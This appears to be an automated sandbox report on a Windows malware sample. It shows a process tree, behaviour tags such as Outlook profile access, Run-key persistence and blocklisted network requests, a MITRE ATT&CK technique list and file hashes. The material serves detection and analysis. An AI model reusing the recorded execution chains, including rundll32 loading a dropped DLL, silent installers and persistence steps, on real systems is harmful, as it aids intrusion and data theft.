C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe5⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\54a78f3534054e4094b5dcc8bfa8fe17 /t 7532 /p 14841⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
-
C:\Windows\system32\werfault.exe (depth 1)
  werfault.exe /h /shared Global\268664f747d1418988c88ecd44fa4698 /t 9716 /p 9420
-
C:\Windows\system32\msiexec.exe (depth 1)
  C:\Windows\system32\msiexec.exe /V
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
  C:\Windows\syswow64\MsiExec.exe -Embedding 6876689D2F1664046433D64C4AADC227 C
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
  C:\Windows\syswow64\MsiExec.exe -Embedding AC68B23265445E6FB00590B6FA68998A C
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
  C:\Windows\syswow64\MsiExec.exe -Embedding 3AD283306D8C3C90D173224BD6B7F275
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe (depth 2)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe (depth 3)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 4)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--loGQqfG2tg"
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  C:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x234,0x238,0x23c,0x230,0x240,0x7ffb7845dec0,0x7ffb7845ded0,0x7ffb7845dee0
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=2316 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2576 /prefetch:1
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2568 /prefetch:1
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=1772 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1724 /prefetch:2
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=3128 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3168 /prefetch:2
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=3360 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=3380 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=2184 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=2192 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=1852 /prefetch:8
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_BB94.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"
- Blocklisted process makes network request
-
C:\Windows\System32\Conhost.exe (depth 4)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
  C:\Windows\syswow64\MsiExec.exe -Embedding DB7EC0B51976DC47F317AD599C06B9E8
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe (depth 3)
  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exe (depth 2)
  C:\Windows\syswow64\MsiExec.exe -Embedding 19F7D6E831BF19A4C95537D0EFB746CD E Global\MSI0000
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
-
C:\Windows\system32\werfault.exe (depth 1)
  werfault.exe /h /shared Global\1f0e62ce01534bbf9891dab1858bfd74 /t 9096 /p 9828
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
-
\??\c:\windows\system32\svchost.exe (depth 1)
  c:\windows\system32\svchost.exe -k netsvcs -s BITS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
-
C:\Windows\system32\rundll32.exe (depth 1)
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exe (depth 2)
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
-
C:\Windows\system32\rundll32.exe (depth 1)
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\rundll32.exe (depth 2)
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
-
C:\Windows\system32\rundll32.exe (depth 1)
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exe (depth 2)
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
-
C:\Windows\system32\rundll32.exe (depth 1)
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exe (depth 2)
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
-
C:\Windows\SysWOW64\WerFault.exe (depth 3)
  C:\Windows\SysWOW64\WerFault.exe -u -p 10368 -s 632
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\browser_broker.exe (depth 1)
  C:\Windows\system32\browser_broker.exe -Embedding
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\browser_broker.exe (depth 1)
  C:\Windows\system32\browser_broker.exe -Embedding
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
-
\??\c:\windows\system32\svchost.exe (depth 1)
  c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exe (depth 2)
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{672b794e-6cf9-1243-b4ff-a852a521e24d}\oemvista.inf" "9" "4d14a44ff" "0000000000000190" "WinSta0\Default" "0000000000000138" "208" "c:\program files (x86)\maskvpn\driver\win764"
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exe (depth 2)
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "00000000000001A8"
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exe (depth 1)
  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
-
\??\c:\windows\system32\svchost.exe (depth 1)
  c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe (depth 1)
  "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe (depth 2)
  MaskVPNUpdate.exe /silent
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\browser_broker.exe (depth 1)
  C:\Windows\system32\browser_broker.exe -Embedding
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\system32\backgroundTaskHost.exe (depth 1)
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
-
\??\c:\windows\system32\svchost.exe (depth 1)
  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
-
\??\c:\windows\system32\svchost.exe (depth 1)
  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
- Modify Existing Service 1
- Registry Run Keys / Startup Folder 2
- Scheduled Task 1
- BITS Jobs 1
Defense Evasion
- Modify Registry 5
- Disabling Security Tools 1
- Virtualization/Sandbox Evasion 1
- File Permissions Modification 1
- BITS Jobs 1
- Install Root Certificate 1
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1427fbafcf251.exeMD5
8e0abf31bbb7005be2893af10fcceaa9
SHA1a48259c2346d7aed8cf14566d066695a8c2db55c
SHA2562df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1427fbafcf251.exeMD5
8e0abf31bbb7005be2893af10fcceaa9
SHA1a48259c2346d7aed8cf14566d066695a8c2db55c
SHA2562df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142ac5249376e895.exeMD5
91e3bed725a8399d72b182e5e8132524
SHA10f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA25618af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142ac5249376e895.exeMD5
91e3bed725a8399d72b182e5e8132524
SHA10f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA25618af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exeMD5
a1d90c2ea649aae4d9492b584c52ef5c
SHA132969454090b6dd84a9b97d19bd58845cda5aae6
SHA25664f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA51209bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exeMD5
a1d90c2ea649aae4d9492b584c52ef5c
SHA132969454090b6dd84a9b97d19bd58845cda5aae6
SHA25664f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA51209bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat144474a564d26f29.exeMD5
962b4643e91a2bf03ceeabcdc3d32fff
SHA1994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
